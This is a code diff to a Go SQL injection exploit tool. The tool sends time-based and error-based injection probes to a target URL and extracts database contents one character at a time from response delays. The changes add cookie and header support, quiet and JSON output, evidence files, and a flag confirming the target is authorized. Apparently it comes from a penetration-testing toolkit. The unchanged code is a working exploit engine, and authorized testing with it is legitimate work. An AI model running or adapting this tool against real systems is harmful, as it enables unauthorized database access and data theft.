更新: 359 个文件 - 2026-03-16 23:30:01

01-sql-injection/tools/sqli-exploit.go

@@ -2,11 +2,13 @@
 package main
 
 import (
+	"encoding/json"
 	"flag"
 	"fmt"
 	"io"
 	"net/http"
 	"net/url"
+	"os"
 	"strings"
 	"sync"
 	"time"
@@ -19,6 +21,9 @@ type SQLiExploit struct {
 	Param     string
 	Threads   int
 	Timeout   time.Duration
+	Headers   map[string]string
+	Cookie    string
+	Quiet     bool
 }
 
 type InjectionResult struct {
@@ -51,6 +56,7 @@ func NewSQLiExploit(target, method, param string, threads int, timeout time.Dura
 		Param:     param,
 		Threads:   threads,
 		Timeout:   timeout,
+		Headers:   map[string]string{},
 	}
 }
 
@@ -78,6 +84,12 @@ func (s *SQLiExploit) SendRequest(payload string) (string, int, error) {
 	}
 
 	req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36")
+	for k, v := range s.Headers {
+		req.Header.Set(k, v)
+	}
+	if s.Cookie != "" {
+		req.Header.Set("Cookie", s.Cookie)
+	}
 
 	resp, err := s.Client.Do(req)
 	if err != nil {
@@ -120,8 +132,10 @@ func (s *SQLiExploit) TestTimeBased(payloads []struct {
 					ResponseLen: respLen,
 				})
 				mu.Unlock()
-				fmt.Printf("%s[VULN]%s [Time-based] %s - Delay: %v - DBMS: %s\n",
-					colorRed+colorBold, colorEnd, payload, elapsed, dbms)
+				if !s.Quiet {
+					fmt.Printf("%s[VULN]%s [Time-based] %s - Delay: %v - DBMS: %s\n",
+						colorRed+colorBold, colorEnd, payload, elapsed, dbms)
+				}
 			}
 		}(p.Payload, p.DBMS, p.Delay)
 	}
@@ -159,8 +173,10 @@ func (s *SQLiExploit) TestErrorBased(payloads []struct {
 					DBMS:        dbms,
 					ResponseLen: respLen,
 				})
-				fmt.Printf("%s[VULN]%s [Error-based] %s - DBMS: %s\n",
-					colorRed+colorBold, colorEnd, p.Payload, dbms)
+				if !s.Quiet {
+					fmt.Printf("%s[VULN]%s [Error-based] %s - DBMS: %s\n",
+						colorRed+colorBold, colorEnd, p.Payload, dbms)
+				}
 				break
 			}
 		}
@@ -173,7 +189,9 @@ func (s *SQLiExploit) ExtractData(query string, technique string, dbms string, m
 	var result strings.Builder
 	charset := "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-@."
 
-	fmt.Printf("\n%s[*]%s Extracting: %s\n", colorCyan, colorEnd, query)
+	if !s.Quiet {
+		fmt.Printf("\n%s[*]%s Extracting: %s\n", colorCyan, colorEnd, query)
+	}
 
 	for pos := 1; pos <= maxLen; pos++ {
 		found := false
@@ -197,7 +215,9 @@ func (s *SQLiExploit) ExtractData(query string, technique string, dbms string, m
 				if elapsed >= 900*time.Millisecond {
 					result.WriteByte(byte(char))
 					found = true
-					fmt.Printf("\r%s[+]%s Extracted: %s", colorGreen, colorEnd, result.String())
+					if !s.Quiet {
+						fmt.Printf("\r%s[+]%s Extracted: %s", colorGreen, colorEnd, result.String())
+					}
 					break
 				}
 			}
@@ -212,6 +232,21 @@ func (s *SQLiExploit) ExtractData(query string, technique string, dbms string, m
 	return result.String()
 }
 
+func parseHeaders(raw string) map[string]string {
+	headers := map[string]string{}
+	if raw == "" {
+		return headers
+	}
+	for _, part := range strings.Split(raw, ",") {
+		pair := strings.SplitN(part, ":", 2)
+		if len(pair) != 2 {
+			continue
+		}
+		headers[strings.TrimSpace(pair[0])] = strings.TrimSpace(pair[1])
+	}
+	return headers
+}
+
 func main() {
 	target := flag.String("u", "", "Target URL")
 	method := flag.String("m", "GET", "HTTP Method (GET/POST)")
@@ -222,25 +257,27 @@ func main() {
 	extract := flag.String("extract", "", "Data to extract (user/database/version)")
 	query := flag.String("query", "", "Custom SQL query")
 	dbms := flag.String("dbms", "mysql", "Database type (mysql/mssql/postgresql)")
+	header := flag.String("header", "", "Extra headers in Name:Value,Name2:Value2 format")
+	cookie := flag.String("cookie", "", "Cookie header value")
+	format := flag.String("format", "text", "Output format: text or json")
+	output := flag.String("output", "", "Write output to file")
+	evidenceDir := flag.String("evidence-dir", "", "Optional evidence directory")
+	runID := flag.String("run-id", "", "Associated run ID")
+	caseID := flag.String("case-id", "", "Associated case ID")
+	ackAuthorized := flag.Bool("ack-authorized", false, "Confirm the target is owned or authorized")
 
 	flag.Parse()
 
-	if *target == "" {
+	if *target == "" || !*ackAuthorized {
 		fmt.Printf("%s[ERROR]%s Target URL is required. Use -u flag.\n", colorRed, colorEnd)
 		flag.Usage()
 		return
 	}
 
-	fmt.Printf("\n%s%s%s\n", colorBold, strings.Repeat("=", 60), colorEnd)
-	fmt.Printf("%sSQL Injection Exploit Tool (Go)%s\n", colorBold, colorEnd)
-	fmt.Printf("%s%s%s\n\n", colorBold, strings.Repeat("=", 60), colorEnd)
-
 	exploit := NewSQLiExploit(*target, *method, *param, *threads, *timeout)
-
-	fmt.Printf("%s[INFO]%s Target: %s\n", colorBlue, colorEnd, *target)
-	fmt.Printf("%s[INFO]%s Method: %s\n", colorBlue, colorEnd, *method)
-	fmt.Printf("%s[INFO]%s Parameter: %s\n", colorBlue, colorEnd, *param)
-	fmt.Printf("%s[INFO]%s Technique: %s\n", colorBlue, colorEnd, *technique)
+	exploit.Headers = parseHeaders(*header)
+	exploit.Cookie = *cookie
+	exploit.Quiet = *format != "text"
 
 	timePayloads := []struct {
 		Payload string
@@ -266,14 +303,12 @@ func main() {
 	}
 
 	var allResults []InjectionResult
-
-	fmt.Printf("\n%s[*]%s Testing Time-based Injection...\n", colorCyan, colorEnd)
 	timeResults := exploit.TestTimeBased(timePayloads)
 	allResults = append(allResults, timeResults...)
 
-	fmt.Printf("\n%s[*]%s Testing Error-based Injection...\n", colorCyan, colorEnd)
 	errorResults := exploit.TestErrorBased(errorPayloads)
 	allResults = append(allResults, errorResults...)
+	extractedResult := ""
 
 	if *extract != "" || *query != "" {
 		var extractQuery string
@@ -310,15 +345,54 @@ func main() {
 		}
 
 		if extractQuery != "" {
-			result := exploit.ExtractData(extractQuery, *technique, *dbms, 100)
-			fmt.Printf("\n%s[+]%s Result: %s\n", colorGreen, colorEnd, result)
+			extractedResult = exploit.ExtractData(extractQuery, *technique, *dbms, 100)
 		}
 	}
-
-	fmt.Printf("\n%s%s%s\n", colorBold, strings.Repeat("=", 60), colorEnd)
-	fmt.Printf("%s[SUMMARY]%s Found %d vulnerabilities\n", colorGreen, colorEnd, len(allResults))
-	for _, r := range allResults {
-		fmt.Printf("  - [%s] %s - %s\n", r.VulnType, r.DBMS, r.Payload)
+	report := map[string]interface{}{
+		"tool":               "sqli-exploit-go",
+		"mode":               *technique + "-probe-and-extract",
+		"target":             *target,
+		"status":             "needs-review",
+		"severity":           "info",
+		"timestamp":          time.Now().UTC().Format(time.RFC3339),
+		"request_summary":    map[string]interface{}{"method": *method, "param": *param, "threads": *threads, "dbms": *dbms},
+		"payload_or_probe":   map[string]interface{}{"hits": allResults, "extract": *extract, "query": *query, "result": extractedResult},
+		"evidence_refs":      []string{},
+		"minimal_validation": "只读探测、最小化注入、可审计回显、可回滚验证。",
+		"authorization_scope": "lab-local, lab-public, authorized-third-party",
+		"destructive_risk":   "medium",
+		"run_id":             *runID,
+		"case_id":            *caseID,
 	}
-	fmt.Printf("%s%s%s\n\n", colorBold, strings.Repeat("=", 60), colorEnd)
+	if len(allResults) > 0 || extractedResult != "" {
+		report["status"] = "verified"
+		report["severity"] = "high"
+	}
+	if *evidenceDir != "" {
+		_ = os.MkdirAll(*evidenceDir, 0o755)
+		evidencePath := *evidenceDir + "/sqli-exploit-go.json"
+		if raw, err := json.MarshalIndent(report, "", "  "); err == nil {
+			_ = os.WriteFile(evidencePath, append(raw, '\n'), 0o644)
+			report["evidence_refs"] = append(report["evidence_refs"].([]string), evidencePath)
+		}
+	}
+	var content []byte
+	if *format == "json" {
+		content, _ = json.MarshalIndent(report, "", "  ")
+	} else {
+		lines := []string{
+			strings.Repeat("=", 60),
+			"SQL Injection Exploit Tool (Go)",
+			strings.Repeat("=", 60),
+			"Target: " + *target,
+			"Technique: " + *technique,
+			fmt.Sprintf("Hits: %d", len(allResults)),
+			"Status: " + report["status"].(string),
+		}
+		content = []byte(strings.Join(lines, "\n"))
+	}
+	if *output != "" {
+		_ = os.WriteFile(*output, append(content, '\n'), 0o644)
+	}
+	fmt.Println(string(content))
 }